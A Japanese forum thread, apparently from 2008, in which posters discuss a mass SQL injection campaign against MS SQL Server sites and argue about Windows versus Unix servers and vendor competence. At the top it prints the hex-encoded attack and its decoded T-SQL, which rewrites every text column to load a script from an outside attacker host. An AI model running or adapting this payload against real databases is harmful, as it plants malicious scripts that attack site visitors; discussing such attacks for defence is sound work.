54205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736
372697074207372633D687474703A2F2F73312E6361776A622E636F6D2F6A702E6A733E3C2F7363726970743E272727292046455443482
04E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F
72204445414C4C4F43415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);--,

0x〜の部分をPRINTして見ました。改行はこちらでしています。

DECLARE @T VARCHAR(255), @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE (@@FETCH_STATUS=0)
BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://s1.cawjb.com/jp.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

>>246
いや、それは根本対策になってない
そういう考えで設計してると必ず脆弱性を作りこむ
むしろIIS6以上はApacheより優秀だとすら感じる

>>248
そのhttp://の部分踏むとやばいだろ
それ通報されないか？

>>249
>IIS6以上はApacheより優秀だとすら感じる

「感じる」、じゃなくて「信じる」だろｗ

「現時点での仕様でございます・・」

要するにF5アタックとどっちが危険なのさ？

>>253
重要情報を扱ってるサイトなら
こっちの方がはるかに危険

>>248
ほえー

ＰＬ／ＳＱＬすらまともに触ったことないからまったく理解できん
ＳＱＬサーバーだとこんなん実行できるんか

>>254
個人情報流出やらかしたサウンドハウスもWindows鯖だったしな・・・

　　　　　　　ヽ|/
　　　　 ／￣￣￣｀ヽ、
　　　 /　　 　　　　　　ヽ
　　　/　 ＼,, ,,／ 　　　|
　　　|　（●） （●）|||　 |
　　　| 　/￣⌒￣ヽ　U.| 　　・・・・・･･･ｺﾞｸﾘ。F5アタック以上かよマジパネェ
　　　|　 | .ｌ~￣~ヽ |　　 |
　　　|U ヽ ￣~￣ ﾉ　　 |
　　　|　　 ￣￣￣　　　 |

>>248
運が悪いとMSSQLは最後の--だけでプロセス落ちるからなｗ

>>256
Windows鯖がわるいんじゃなく
あくまでもインジェクション対策できてなかったアプリと
SQLサーバの設計者が権限回りの設計をしてないのが悪い

>>258
あるあるｗ

ごめん、これって一般人はどういう対策をしたらいいの?
もう、>>1の時点で全く理解出来んorz

>>259
はいはい、MS様は何も悪くないんですよねｗ

>>261
>これって一般人はどういう対策をしたらいいの?

ネットはMacで見るようにする。

>>262
いや、普通にこの件に関してはそうだぞ
ちゃんと問題を理解してないとわからないかもしれないけど

>>264
いやMSも悪いだろ
ASPの仕様として無効な文字を勝手に消すとか、「検知回避してください」と言ってるようなもんだ。

>>264
Unix系DBみたいに明確にDB実行ユーザーを割り当てず、デフォで何でもカンでも同じ鯖管ユーザーに
やらせることになってるから、どっか破られたら即鯖全体がやられるんだろｗ

>>250
今はその URL に何も置かれてないみたいだけど。
置かれていても、踏んだってそのまま表示されるだけで何も起こらない。
データベースの画面表示に使われる項目が入ってるカラムを
外部の JavaScript のソースを読み込ませるタグを追加して書き換えようとしてるんだな。
表示側で html 等の意味のあるものをそのまま出力しないように（サニタイジング言うな）
なっていればこれが成功しても、問題は起きないわけではあるが。

>>259
対策のしようがある仕様になっているかどうかが問題かと思う。
バインドするにしてもO/Rマッピングするにしても、
それに使うモノを作った人がその仕様を把握しきれるかどうかが問題になる。
謎な仕様が多いものは避けるにこしたこたない。
不正アクセス検知の面から見ても、謎な仕様に対応した製品を必死で探すよりは
謎な仕様をなくしてもらうか、謎な仕様が少ない製品を採用した方がいい。

>>263
JavaScript の内容次第では Mac でも問題が起きない事はない。
ローカルに何か置かれて実行までされたような例は聞いた事がないが。

>>267
>ローカルに何か置かれて実行までされたような例は聞いた事がないが。

それはLinux/OS Xでは実現不可だから。JavaScriptといってもローカルのファイルまで操作
みたいな凶悪なことができるのは、MSが勝手に拡張したJScriptのみ。
これはWIndows（IE）環境でしかうごかない。

　　　　　　　 lヽ ﾉ l　　　　　　　　ｌ l　ｌ ヽ　　 ヽ
　 )'ｰーノ(　 |　|　 | ､　　　　　 / l｜ ｌ　ハヽ　　|ｰ‐''"ｌ
　/　S　　|　|　|／| ﾊ　　/ / ,/ /|ﾉ /l /　ｌ l ｌ|　ｌ　 S ヽ
　l 　 ･　　i´ |　ヽ､| |ｒ|| |　//--‐'" 　 ｀'メ､_ｌﾉ| /　 ・　 /
　|　 Q　　l　 トー-トヽ| |ノ　''"´｀　　　ｒｰ-/// |　 Q　｜
　|　 ･　　 |／　　 　 | l ||､　''"""　 j　""''/ | |ヽｌ 　・　｜
　|　 L 　 |　　 　 　 | l |　ヽ,　 　― 　 ／　| |　ｌ　 L　 |
　| 　 !!　 |　　 　 /　| | |　　 ` ｰ-‐ ' ´||　,ﾉ| |　|　　!!　｜
ノｰ‐---､,|　 　 /　│ｌ､l　　　　　　 　 |ﾚ' ,ﾉﾉ　ﾉハ､_ノヽ
　/ 　　 　 　 ／　ノ⌒ヾ､　 ヽ　　　 ノハ,　　　 　 |
,/ 　 　　　,イーｆ'´ /´　　＼　| ,／´ ｜ヽl　　　 　 |
　　　　 ／-ト、|　┼―- ､_ヽﾒr'　, -=ｌ''"ハ　　　　|　 ｌ
　　 ,／　 　|　ヽ 　＼　　_,ノｰｆ' ´　　ﾉノ　 ヽ　 　｜　|
､_　　　 _ ‐''ｌ　　`ー‐―''" ⌒'ｰ--‐'´｀ヽ､_ 　　_,ノ　ノ
　 ￣￣　　 |　　　　　　　　　　 ／　 　　　　

>>267
置かれてなくて良かった

>>266
さすがに企業で使うサーバで
デフォ設定で利用してたらSIが糞だろ
無知な個人じゃないんだから

>>265
まぁまったく非がないとは言わないが
対策は広く知れ渡ってるものなんだからってのはある

>>270
>無知な個人じゃないんだから

無知なバカに限ってWIN鯖を使いたがるワナ。
しかもちゃんと設定しようとすると、Unix系鯖の何倍も手間がかかるというオチｗ

w

で、ビパより高い攻撃力なのか？

だからWindows鯖はやめとけとあれほど。。。

大陸ではツール公開して島国でのテスト結果を曝して皆で日々共同研究してるじゃないか
しらない間にそのサイトにあなたの管理サイトの名前が載ってたりするよ

異論！
反論！
↓

>>3
wktk
呪ってくれｗ

AVGfreeは対応してる？

>>1
ＳＱＬインジェクションなどプロなら余裕で防げる。
日本のＳＩ屋の質がヘボイだけだろ。
俺を採用しない日本のバカＩＴ企業は自業自得。

プロ（笑）。

日本を襲う史上最悪のサイバー攻撃 : サイバー護身術 : セキュリティー : ネット＆デジタル : YOMIURI ONLINE（読売新聞）
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20081226nt0b.htm?from=yoltop

素人の趣味をバカにしていながらそれ以下の技術力しかないプロが多いのが日本のＳＩ屋。
口八丁のコミュニケーション能力を重視し技術力を軽視ししてるからお粗末なことになっても自業自得。
ＩＴ企業はクライアントに多額の損害賠償払えばいい。

今回の攻撃は、一般ユーザーに感染したボットから行われているため、犯人を追跡することは難しい。
しかし状況証拠から、犯人は中国在住ではないかと思える節がある。
ラックによると「解析したところ、中国政府と中国の学校のドメインは攻撃しないように指定していた」とのこと。
中国政府のドメインである「ｇｏｖ．ｃｎ」と中国の学校関連のドメイン「ｅｄｕ．ｃｎ」だけは、
ＳＱＬインジェクション攻撃をしないようにプログラムされていたのだ。

MS06-014
これってザク�U？

なんか人を素人呼ばわりしたい自称プロがいっぱいいるスレですね。

>>282
素人しかいないのが問題なんだよｗ

オンラインゲームでＰ２Ｐじゃないものって無料ゲームとか？
有料でＰ２Ｐじゃないものも多いのか？

　　↑
Ｐ２Ｐの意味わかってるの？

釣り師だらけでふいた。

Ｐ２Ｐはパッケ購入するネトゲかね？
マッチングサーバだけ用意して、遊ぶときはＰ２Ｐ通信

クライアントが無料のネトゲだと、Ｐ２Ｐは珍しい気がする。
チートし放題になりそうだし

w

>>283

＞ 中国政府のドメインである「ｇｏｖ．ｃｎ」と中国の学校関連のドメイン「ｅｄｕ．ｃｎ」だけは、ＳＱＬインジェクション攻撃をしないようにプログラムされていたのだ。


この問題は・・・
ｇｏｖ．ｃｎとｅｄｕ．ｃｎだけを攻撃するように書き変えて感染したら解決するんじゃね？

うむ

>>292
www

>>1
ザク？

MSへの損害訴訟まだ〜？

>>1

意味わかんねえけど、すげえヤバイ気がするｗ
今まで見たスレタイの中で一番おどろおどろしいｗ

意味がわかんないけど、
フラッシュプレーヤー9.0.124.0から10にアップした方がいい？

Winしか使えない奴は、OSやSQLServerが悪いんじゃなくて管理者が悪いというのが定番になったな。
MSの製品が危険と認めたら失業だもんなｗｗｗ

↑
Winの使い方を知らないひと

>>299

win鯖がハッキングされるのはベンダーが悪い。
vistaが売れないのはPCメーカーが悪い。
Xboxのディスクに傷が吐くのはユーザーが悪い。

いや、　　　中国が悪いに決まってるだろｗ

「MicrosoftはXbox 360の欠陥を認識しながら修理を見送った」ことが裁判資料で判明

http://itpro.nikkeibp.co.jp/article/NEWS/20081219/321777/

>>298
無駄な行為
これはユーザーがどうあがいてもどうしようもない問題だ。

ラック（笑）

>>282
むしろ生粋の文系ほど採用されやすい罠

ITまったくわかってない文系の幹部がセールストークに騙されて
MS製品導入ってケースもあります。
イニシャルコストしか見てない。

>>307
イニシャルコストしか見なけりゃ
MS製品にならないんだがな
MS製品の良さはサポート

>>308
ちょｗ
MS製品のサポートは購入ベンダしかやらんだろ
MSの直サポートは絶対ないぞ

>>309
うちはMSのプレミアムサポート入ってるよ
MSのエンジニアに直にやってもらってる

>>310
金かかるじゃんｗ
MS製品の不具合調査するのに金かかるとかどうなの・・

技術力が無ければMSに頼らざるを得ないし、技術力がなければそもそも
Windows以外は無理なんだから金がかかるのはしょうがないでしょ。
お金を払うから技術は任せたってのがMSとの付き合い方。

>>311
オープンソースとかで自前でやるより
人件費を考えれば結局金掛からないよ
それにオープンソースとか使ってたら
責任取れないし
別に技術力ないわけじゃないけど

個人で使うならいいけどね

>>311
あっ言い忘れたけど
不具合やバグだった場合は
金掛からないよ

プレミアムサポートでは明らかな不具合を
仕様とか言ったりはしないから